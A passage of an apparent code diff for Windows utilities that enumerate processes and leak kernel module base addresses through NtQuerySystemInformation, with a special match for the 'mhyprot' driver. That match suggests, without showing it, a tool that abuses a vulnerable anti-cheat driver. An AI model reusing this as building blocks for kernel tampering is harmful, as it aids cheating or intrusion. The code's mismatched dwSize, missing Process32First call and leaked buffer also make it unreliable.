SystemLoadGdiDriverInformation = 26,
SystemUnloadGdiDriverInformation = 27,
SystemTimeAdjustmentInformation = 28,
SystemSummaryMemoryInformation = 29,
SystemMirrorMemoryInformation = 30,
SystemPerformanceTraceInformation = 31,
SystemObsolete0 = 32,
SystemExceptionInformation = 33,
SystemCrashDumpStateInformation = 34,
SystemKernelDebuggerInformation = 35,
SystemContextSwitchInformation = 36,
SystemRegistryQuotaInformation = 37,
SystemExtendServiceTableInformation = 38,
SystemPrioritySeperation = 39,
SystemVerifierAddDriverInformation = 40,
SystemVerifierRemoveDriverInformation = 41,
SystemProcessorIdleInformation = 42,
SystemLegacyDriverInformation = 43,
SystemCurrentTimeZoneInformation = 44,
SystemLookasideInformation = 45,
SystemTimeSlipNotification = 46,
SystemSessionCreate = 47,
SystemSessionDetach = 48,
SystemSessionInformation = 49,
SystemRangeStartInformation = 50,
SystemVerifierInformation = 51,
SystemVerifierThunkExtend = 52,
SystemSessionProcessInformation = 53,
SystemLoadGdiDriverInSystemSpace = 54,
SystemNumaProcessorMap = 55,
SystemPrefetcherInformation = 56,
SystemExtendedProcessInformation = 57,
SystemRecommendedSharedDataAlignment = 58,
SystemComPlusPackage = 59,
SystemNumaAvailableMemory = 60,
SystemProcessorPowerInformation = 61,
SystemEmulationBasicInformation = 62,
SystemEmulationProcessorInformation = 63,
SystemExtendedHandleInformation = 64,
SystemLostDelayedWriteInformation = 65,
SystemBigPoolInformation = 66,
SystemSessionPoolTagInformation = 67,
SystemSessionMappedViewInformation = 68,
SystemHotpatchInformation = 69,
SystemObjectSecurityMode = 70,
SystemWatchdogTimerHandler = 71,
SystemWatchdogTimerInformation = 72,
SystemLogicalProcessorInformation = 73,
SystemWow64SharedInformation = 74,
SystemRegisterFirmwareTableInformationHandler = 75,
SystemFirmwareTableInformation = 76,
SystemModuleInformationEx = 77,
SystemVerifierTriageInformation = 78,
SystemSuperfetchInformation = 79,
SystemMemoryListInformation = 80,
SystemFileCacheInformationEx = 81,
MaxSystemInfoClass = 82
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID DllBase;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;
char ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
);
+98
View File
@@ -0,0 +1,98 @@
#include "win_utils.h"
//
// find the process id by specific name using ToolHelp32Snapshot
//
uint32_t win_utils::find_process_id(const std::string_view process_name)
{
PROCESSENTRY32 processentry = {};
const unique_handle snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);
if (!CHECK_HANDLE(snapshot.get()))
{
//(("[!] Failed to create ToolHelp32Snapshot [0x%lX]\n"), GetLastError());
return 0;
}
processentry.dwSize = sizeof(MODULEENTRY32);
while (Process32Next(snapshot.get(), &processentry) == TRUE)
{
if (process_name.compare(processentry.szExeFile) == 0)
{
return processentry.th32ProcessID;
}
}
return 0;
}
//
// lookup base address of specific module that loaded in the system
// by NtQuerySystemInformation api
//
uint64_t win_utils::obtain_sysmodule_address(const std::string_view target_module_name)
{
const HMODULE module_handle = GetModuleHandle(TEXT(("ntdll.dll")));
if (!CHECK_HANDLE(module_handle))
return 0;
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(module_handle, "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
return 0;
NTSTATUS status;
PVOID buffer;
ULONG alloc_size = 0x10000;
ULONG needed_size;
do
{
buffer = calloc(1, alloc_size);
if (!buffer)
return 0;
status = NtQuerySystemInformation(SystemModuleInformation, buffer, alloc_size, &needed_size);
if (!NT_SUCCESS(status) && status != STATUS_INFO_LENGTH_MISMATCH)
{
free(buffer);
return 0;
}
if (status == STATUS_INFO_LENGTH_MISMATCH)
{
free(buffer);
buffer = NULL;
alloc_size *= 2;
}
} while (status == STATUS_INFO_LENGTH_MISMATCH);
if (!buffer)
return 0;
PSYSTEM_MODULE_INFORMATION module_information = (PSYSTEM_MODULE_INFORMATION)buffer;
for (ULONG i = 0; i < module_information->Count; i++)
{
SYSTEM_MODULE_INFORMATION_ENTRY module_entry = module_information->Module[i];
ULONG_PTR module_address = (ULONG_PTR)module_entry.DllBase;
if (module_address < MIN_ADDRESS)
continue;
PCHAR module_name = module_entry.ImageName + module_entry.ModuleNameOffset;
if (target_module_name.compare(module_name) == 0 || std::string(module_name).find(("mhyprot")) != std::string::npos)
return module_address;
}
free(buffer);
return 0;
}
+18
View File
@@ -0,0 +1,18 @@
#pragma once
#include <Windows.h>
#include <string>
#include <memory>
#include <TlHelp32.h>
#include "nt.h"
#define CHECK_HANDLE(x) (x && x != INVALID_HANDLE_VALUE)
#define MIN_ADDRESS ((ULONG_PTR)0x8000000000000000)
namespace win_utils
{
using unique_handle = std::unique_ptr<void, decltype(&CloseHandle)>;
uint32_t find_process_id(const std::string_view process_name);
uint64_t obtain_sysmodule_address(const std::string_view target_module_name);
}